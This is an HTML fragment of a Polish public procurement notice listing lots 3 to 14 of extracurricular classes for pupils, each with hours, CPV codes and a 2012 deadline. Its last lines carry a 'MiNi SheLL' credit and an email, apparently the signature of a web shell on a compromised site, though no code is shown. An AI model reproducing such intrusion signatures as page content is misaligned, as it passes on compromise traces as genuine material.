<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 8 uczniów (2 chłopców, 6 dziewczynek) w ilości 40 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia korekcyjno - kompensacyjne dla uczniów ze specjalnymi potrzebami edukacyjnymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 5 uczniów (3 chłopców, 2 dziewczynki) w ilości 40 godzin po 60 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mediacje rówieśnicze-socjoterapeutyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 6 uczniów (4 chłopców, 2 dziewczynki) w ilości 43 godziny po 60 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Z komputerem na TY zajęcia rozwijające kompetencje informatyczne dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 8 uczniów (6 chłopców, 2 dziewczynki) w ilości 30 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mały reporter zajęcia dla dzieci rozwijające zainteresowania dziennikarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 8 uczniów (3 chłopców, 5 dziewczynek) w ilości 30 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 6 uczniów (3 chłopców, 3 dziewczynki) w ilości 32 godziny,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Z komputerem na TY zajęcia rozwijające kompetencje informatyczne dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 5 uczniów (3 chłopców, 2 dziewczynki) w ilości 32 godziny,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Chodź pomaluj mój świat zajęcia rozwijające zdolności plastyczne dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 8 uczniów (8 dziewczynek) w ilości 32 godziny,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> zajęcia socjoterapeutyczne dla dzieci z zaburzeniami komunikacji społecznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 5 uczniów (5 dziewczynek) w ilości 34 godziny po 60 minut,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych polonistycznie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 4 uczniów (4 dziewczynki) w ilości 30 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zajęcia matematyczne rozwijające zainteresowania uczniów szczególnie uzdolnionych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 5 uczniów (3 dziewczynki, 2 chłopców) w ilości 30 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zajęcia z języka angielskiego rozwijające zainteresowania dzieci szczególnie uzdolnionych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 7 uczniów (3 dziewczynki, 4 chłopców) w ilości 30 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zajęcia dla dzieci uzdolnionych artystycznie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1 grupie składającej się z 8 uczniów (7 dziewczynek, 1 chłopiec) w ilości 30 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com